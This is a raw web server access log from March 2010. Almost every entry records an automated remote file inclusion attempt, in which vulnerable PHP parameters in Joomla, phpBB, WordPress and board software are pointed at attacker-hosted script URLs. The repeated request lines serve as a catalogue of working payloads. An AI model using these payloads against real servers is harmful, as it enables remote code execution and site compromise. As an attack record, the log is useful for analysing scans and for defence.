204.202.238.67 - - [06/Mar/2010:08:24:14 -0800] "GET /logs/access_100227.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:08:24:16 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:08:24:16 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:08:24:16 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:24:31 -0800] "GET /logs/access_100227.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
69.90.47.134 - - [06/Mar/2010:08:24:41 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
69.90.47.134 - - [06/Mar/2010:08:24:41 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
69.90.47.134 - - [06/Mar/2010:08:24:41 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:08:25:54 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:08:25:54 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:08:25:54 -0800] "GET /logs/access_100227.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.227.136.138 - - [06/Mar/2010:08:27:04 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:27:10 -0800] "GET /logs//yuboard/write_comment_update.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:27:10 -0800] "GET /logs/access_100220.log%20%20//yuboard/write_comment_update.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:27:10 -0800] "GET /yuboard/write_comment_update.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:27:32 -0800] "GET /logs//phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:27:32 -0800] "GET /logs/access.log//phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:27:32 -0800] "GET /phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:27:34 -0800] "GET /phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:27:34 -0800] "GET /logs/access.log//phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:27:34 -0800] "GET /logs//phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:28:15 -0800] "GET /logs/access.log%20%20//yuboard/write_comment_update.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:28:36 -0800] "GET /logs//phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:28:36 -0800] "GET /logs/access.log%20%20//phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:28:36 -0800] "GET /phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:28:39 -0800] "GET /phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:28:39 -0800] "GET /logs//phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.139 - - [06/Mar/2010:08:28:39 -0800] "GET /logs/access.log%20%20//phphtml.php?htmlclass_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
69.90.47.134 - - [06/Mar/2010:08:30:13 -0800] "GET /logs/access_100227.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:08:40:49 -0800] "GET /bbs//skin/ggambo6200_board/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:08:40:49 -0800] "GET /logs/access.log//bbs//skin/ggambo6200_board/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
116.127.121.117 - - [06/Mar/2010:08:40:49 -0800] "GET /logs//bbs//skin/ggambo6200_board/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:41:19 -0800] "GET /yuboard/delete_comment.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:41:22 -0800] "GET /logs/access_100220.log%20%20//yuboard/delete_comment.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:41:22 -0800] "GET /logs//yuboard/delete_comment.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:08:42:00 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:08:42:00 -0800] "GET /logs/access_100220.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:08:42:00 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:42:23 -0800] "GET /logs/access.log%20%20//yuboard/delete_comment.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:47:39 -0800] "GET /yuboard/delete_comment.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:47:39 -0800] "GET /logs//yuboard/delete_comment.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:47:40 -0800] "GET /logs/access_100220.log%20%20//yuboard/delete_comment.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:49:03 -0800] "GET /logs/access.log%20%20//yuboard/delete_comment.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.36.232.169 - - [06/Mar/2010:08:49:06 -0800] "GET ////administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:08:49:08 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:08:49:08 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.216.127.211 - - [06/Mar/2010:08:49:08 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.36.232.169 - - [06/Mar/2010:08:49:09 -0800] "GET /logs/////administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.36.232.169 - - [06/Mar/2010:08:49:09 -0800] "GET /logs/access.log/////administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.36.232.169 - - [06/Mar/2010:08:50:08 -0800] "GET ////administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.36.232.169 - - [06/Mar/2010:08:50:08 -0800] "GET /logs/access.log/////administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.36.232.169 - - [06/Mar/2010:08:50:08 -0800] "GET /logs/////administrator/components/com_sef/config.sef.php?mosConfig.absolute.path=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:08:50:08 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:08:50:08 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:08:50:08 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:08:50:26 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:08:50:26 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:08:50:26 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.251.189.205 - - [06/Mar/2010:08:51:31 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ingavanzada.com/images/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.251.189.205 - - [06/Mar/2010:08:51:31 -0800] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ingavanzada.com/images/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.251.189.205 - - [06/Mar/2010:08:51:31 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ingavanzada.com/images/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:08:54:19 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:08:54:19 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:08:54:19 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:54:25 -0800] "GET /logs/access.log//yuboard/delete_comment.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.175.213.166 - - [06/Mar/2010:08:55:31 -0800] "GET /logs/access_100227.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:08:56:25 -0800] "GET /logs/access.log//yuboard/delete_comment.php?board_skin_path=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:09:03:25 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:09:03:25 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1087 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:09:03:25 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:09:03:27 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:09:03:27 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1087 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:09:03:29 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:09:03:38 -0800] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:09:03:38 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:09:03:39 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:09:04:26 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:09:04:26 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:09:04:26 -0800] "GET /logs/access_100227.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:05:37 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:05:37 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:05:37 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1087 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:05:37 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:05:37 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.101.214.54 - - [06/Mar/2010:09:05:37 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1087 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.111.160 - - [06/Mar/2010:09:05:53 -0800] "GET /logs/access_100109.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:09:08:37 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:09:08:37 -0800] "GET /logs/access_100227.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:09:08:40 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:09:08:50 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:09:08:50 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:09:08:56 -0800] "GET /logs/access_100227.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.251.189.205 - - [06/Mar/2010:09:09:57 -0800] "GET /logs/access.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.ingavanzada.com/images/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
213.251.189.205 - - [06/Mar/2010:09:09:57 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.ingavanzada.com/images/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
213.251.189.205 - - [06/Mar/2010:09:09:57 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.ingavanzada.com/images/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
165.132.30.11 - - [06/Mar/2010:09:10:34 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1087 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
165.132.30.11 - - [06/Mar/2010:09:10:35 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
165.132.30.11 - - [06/Mar/2010:09:10:35 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
165.132.30.11 - - [06/Mar/2010:09:10:49 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1087 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:09:10:49 -0800] "GET /logs/access_100109.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
165.132.30.11 - - [06/Mar/2010:09:10:49 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:09:10:49 -0800] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
165.132.30.11 - - [06/Mar/2010:09:10:49 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.0" 200 899 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:09:10:49 -0800] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:09:12:37 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 1087 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:09:12:37 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:09:12:37 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.187.120.214 - - [06/Mar/2010:09:13:03 -0800] "GET /logs//include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.187.120.214 - - [06/Mar/2010:09:13:03 -0800] "GET /include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.187.120.214 - - [06/Mar/2010:09:13:03 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:09:13:12 -0800] "GET /logs/access_100109.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:09:13:12 -0800] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.46 - - [06/Mar/2010:09:13:12 -0800] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
70.72.194.156 - - [06/Mar/2010:09:14:37 -0800] "GET /include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
70.72.194.156 - - [06/Mar/2010:09:14:37 -0800] "GET /logs//include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
70.72.194.156 - - [06/Mar/2010:09:14:37 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.anideveqqi.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
